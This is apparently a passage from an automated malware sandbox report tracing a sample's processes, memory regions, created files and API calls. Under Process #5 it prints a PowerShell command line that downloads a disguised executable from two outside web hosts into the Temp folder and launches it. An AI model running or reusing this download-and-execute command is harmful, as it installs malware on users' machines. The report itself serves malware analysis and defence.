Environment	Get Environment String		1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String		1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Create	filename = C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 8191, size_out = 0	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Get Info	filename = STD_INPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
File	Read	filename = STD_INPUT_HANDLE, size = 8191, size_out = 0	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Get Info	filename = STD_INPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #5: powershell.exe

(Host: 705, Network: 62)

Information	Value
ID	#5
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	PowerShell "function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,'C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe');Start-Process 'C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe';}try{mihyr8('http://www.events4u.cz/kas23.png')}catch{mihyr8('http://tregartha-dinnie.co.uk/kas23.png')}
Initial Working Directory	C:\Users\aDU0VK IWA5kLS\Desktop\
Monitor	Start Time: 00:01:01, Reason: Child Process
Unmonitor	End Time: 00:02:26, Reason: Terminated by Timeout
Monitor Duration	00:01:25

OS Process Information

Information	Value
PID	0xa40
Parent PID	0xa24 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	AUFDDCNTXWT\aDU0VK IWA5kLS
Groups	AUFDDCNTXWT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:000103d4 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x A44 0x A48 0x A4C 0x A54 0x A58 0x A5C 0x A68 0x A6C 0x A70 0x A74 0x B04 0x B14 0x B20

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00056fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00061fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000070000	0x00070000	0x0007ffff	Private Memory	Readable, Writable	Region Actions Download Dump
powershell.exe.mui	0x00080000	0x00082fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000000090000	0x00090000	0x0010ffff	Private Memory	Readable, Writable	Region Actions Download Dump
locale.nls	0x00110000	0x00176fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000180000	0x00180000	0x0027ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000280000	0x00280000	0x0037ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000380000	0x00380000	0x00507fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000510000	0x00510000	0x00690fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000006a0000	0x006a0000	0x01a9ffff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001aa0000	0x01aa0000	0x01aa0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001ab0000	0x01ab0000	0x01ab0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001ac0000	0x01ac0000	0x01bbffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000001bc0000	0x01bc0000	0x01bc0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001bd0000	0x01bd0000	0x01bd0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001be0000	0x01be0000	0x01be1fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001bf0000	0x01bf0000	0x01bf0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000001c00000	0x01c00000	0x01c01fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001c10000	0x01c10000	0x01c8ffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
cversions.2.db	0x01c90000	0x01c93fff	Memory Mapped File	Readable	Region Actions
private_0x0000000001ca0000	0x01ca0000	0x01caffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000001cb0000	0x01cb0000	0x01d8efff	Pagefile Backed Memory	Readable	Region Actions
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000008.db	0x01d90000	0x01db6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000001dc0000	0x01dc0000	0x01dc0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000001dd0000	0x01dd0000	0x01e4ffff	Private Memory	Readable, Writable	Region Actions Download Dump
sortdefault.nls	0x01e50000	0x0211efff	Memory Mapped File	Readable	Region Actions
cversions.2.db	0x02120000	0x02123fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000002130000	0x02130000	0x02130fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000002140000	0x02140000	0x021bffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000021c0000	0x021c0000	0x025b2fff	Pagefile Backed Memory	Readable	Region Actions
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db	0x025c0000	0x025effff	Memory Mapped File	Readable	Region Actions
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db	0x025f0000	0x02655fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000002660000	0x02660000	0x02662fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000002670000	0x02670000	0x02670fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000002680000	0x02680000	0x026fffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002700000	0x02700000	0x0271ffff	Private Memory		Region Actions Download Dump
private_0x0000000002720000	0x02720000	0x0272ffff	Private Memory	Readable, Writable	Region Actions Download Dump
l_intl.nls	0x02730000	0x02732fff	Memory Mapped File	Readable	Region Actions
private_0x0000000002740000	0x02740000	0x02740fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002750000	0x02750000	0x0275ffff	Private Memory	Readable, Writable	Region Actions Download Dump
sorttbls.nlp	0x02760000	0x02764fff	Memory Mapped File	Readable	Region Actions
sortkey.nlp	0x02770000	0x027b0fff	Memory Mapped File	Readable	Region Actions
private_0x00000000027c0000	0x027c0000	0x0283ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002840000	0x02840000	0x0293ffff	Private Memory	Readable, Writable	Region Actions Download Dump
microsoft.wsman.runtime.dll	0x02940000	0x02947fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000002950000	0x02950000	0x02950fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000002960000	0x02960000	0x02960fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000002960000	0x02960000	0x02970fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000002980000	0x02980000	0x02980fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000029a0000	0x029a0000	0x02a1ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002a20000	0x02a20000	0x02a9ffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000002aa0000	0x02aa0000	0x02ba0fff	Private Memory	Readable, Writable	Region Actions Download Dump
mscorrc.dll	0x02bb0000	0x02c03fff	Memory Mapped File	Readable	Region Actions
private_0x0000000002c10000	0x02c10000	0x02c8ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002c90000	0x02c90000	0x1ac8ffff	Private Memory	Readable, Writable	Region Actions
private_0x000000001ac90000	0x1ac90000	0x1b35ffff	Private Memory	Readable, Writable	Region Actions Download Dump
system.management.automation.dll	0x1b360000	0x1b641fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll.mui	0x1b650000	0x1b70ffff	Memory Mapped File	Readable, Writable	Region Actions
private_0x000000001b710000	0x1b710000	0x1b80ffff	Private Memory	Readable, Writable	Region Actions Download Dump
system.transactions.dll	0x1e230000	0x1e278fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcr80.dll	0x75180000	0x75248fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x77320000	0x7743efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x77440000	0x77539fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77540000	0x776e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x77710000	0x77716fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
powershell.exe	0x13ff50000	0x13ffc6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
culture.dll	0x642ff4a0000	0x642ff4a9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.directoryservices.ni.dll	0x7fee3a90000	0x7fee3c24fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.management.ni.dll	0x7fee3c30000	0x7fee3d9bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.xml.ni.dll	0x7fee3da0000	0x7fee4444fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.management.automation.ni.dll	0x7fee4450000	0x7fee4facfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.ni.dll	0x7fee4fb0000	0x7fee59d2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.security.ni.dll	0x7fee5b00000	0x7fee5b3dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.management.ni.dll	0x7fee5b40000	0x7fee5c57fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.utility.ni.dll	0x7fee5c60000	0x7fee5e75fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.transactions.ni.dll	0x7fee5e80000	0x7fee5f64fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.wsman.management.ni.dll	0x7fee5f70000	0x7fee6019fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.core.ni.dll	0x7fee6020000	0x7fee634dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.consolehost.ni.dll	0x7fee6350000	0x7fee6401fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscorlib.ni.dll	0x7fee6930000	0x7fee780bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscorwks.dll	0x7fee7810000	0x7fee81acfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.configuration.install.ni.dll	0x7fee9400000	0x7fee9431fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.diagnostics.ni.dll	0x7fee9440000	0x7fee94a8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoreei.dll	0x7fef3d20000	0x7fef3db8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoree.dll	0x7fef42a0000	0x7fef430efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
linkinfo.dll	0x7fef72a0000	0x7fef72abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shdocvw.dll	0x7fef72b0000	0x7fef72e3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntshrui.dll	0x7fef8ac0000	0x7fef8b3ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cscapi.dll	0x7fef8b40000	0x7fef8b4efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apphelp.dll	0x7fef9f00000	0x7fef9f56fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x7fefb2a0000	0x7fefb2f5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
slc.dll	0x7fefb8c0000	0x7fefb8cafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
atl.dll	0x7fefb8f0000	0x7fefb908fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntmarta.dll	0x7fefbde0000	0x7fefbe0cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
propsys.dll	0x7fefbe40000	0x7fefbf6bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x7fefbfc0000	0x7fefc1b3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
version.dll	0x7fefc650000	0x7fefc65bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
userenv.dll	0x7fefc840000	0x7fefc85dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x7fefca60000	0x7fefcaa6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x7fefceb0000	0x7fefcec6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
srvcli.dll	0x7fefd280000	0x7fefd2a2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x7fefd380000	0x7fefd38efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x7fefd490000	0x7fefd49efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cfgmgr32.dll	0x7fefd620000	0x7fefd655fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
devobj.dll	0x7fefd660000	0x7fefd679fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x7fefd680000	0x7fefd6eafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x7fefd860000	0x7fefd98cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x7fefd990000	0x7fefda28fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x7fefda30000	0x7fefda5dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x7fefdb00000	0x7fefdbdafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x7fefdd60000	0x7fefddc6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x7fefddd0000	0x7fefded8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x7fefdee0000	0x7fefdfa8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x7fefdfb0000	0x7fefed37fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x7fefed40000	0x7fefeddefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x7fefede0000	0x7fefefe2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wldap32.dll	0x7fefeff0000	0x7feff041fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
setupapi.dll	0x7feff0d0000	0x7feff2a6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x7feff2b0000	0x7feff320fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x7feff330000	0x7feff33dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x7feff5b0000	0x7feff5cefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x7feff5d0000	0x7feff6a6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x7feff860000	0x7feff860fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000007ff00030000	0x7ff00030000	0x7ff0003ffff	Private Memory		Region Actions Download Dump
private_0x000007ff00040000	0x7ff00040000	0x7ff0004ffff	Private Memory		Region Actions Download Dump
private_0x000007ff00050000	0x7ff00050000	0x7ff000effff	Private Memory		Region Actions Download Dump
private_0x000007ff000f0000	0x7ff000f0000	0x7ff000fffff	Private Memory		Region Actions Download Dump
private_0x000007ff00100000	0x7ff00100000	0x7ff0016ffff	Private Memory		Region Actions Download Dump
private_0x000007ff00170000	0x7ff00170000	0x7ff0017ffff	Private Memory		Region Actions Download Dump
private_0x000007ff00180000	0x7ff00180000	0x7ff0018ffff	Private Memory		Region Actions Download Dump
private_0x000007fffff00000	0x7fffff00000	0x7fffff0ffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x000007fffff10000	0x7fffff10000	0x7fffff9ffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x000007fffffae000	0x7fffffae000	0x7fffffaffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000007fffffd4000	0x7fffffd4000	0x7fffffd5fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffd6000	0x7fffffd6000	0x7fffffd7fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffd8000	0x7fffffd8000	0x7fffffd9fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffda000	0x7fffffda000	0x7fffffdafff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffdc000	0x7fffffdc000	0x7fffffddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffde000	0x7fffffde000	0x7fffffdffff	Private Memory	Readable, Writable	Region Actions Download Dump
For performance reasons, the remaining 73 entries are omitted. The remaining entries can be found in flog.txt.

Created Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\users\adu0vk iwa5kls\appdata\local\temp\mvmubw.exe	472.00 KB (483328 bytes)	MD5: 0ebfd6e45dea48c7f54b5574d69da458 SHA1: 11ad0fae8318bc72e1525c161c5df72a9da9430b SHA256: 3ba1b55c3268529b586e154b9117d25ae6c3667a2e869747c51bd88fd2a7a581		File Actions Show Properties Download

Threads

Thread 0xa44

(Host: 337, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Module	Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	9	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
System	Get Info	type = Operating System	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn
Environment	Get Environment String	name = PSMODULEPATH, result_out = C:\Users\aDU0VK IWA5kLS\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096	3	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096	41	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 436	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0	1	Fn
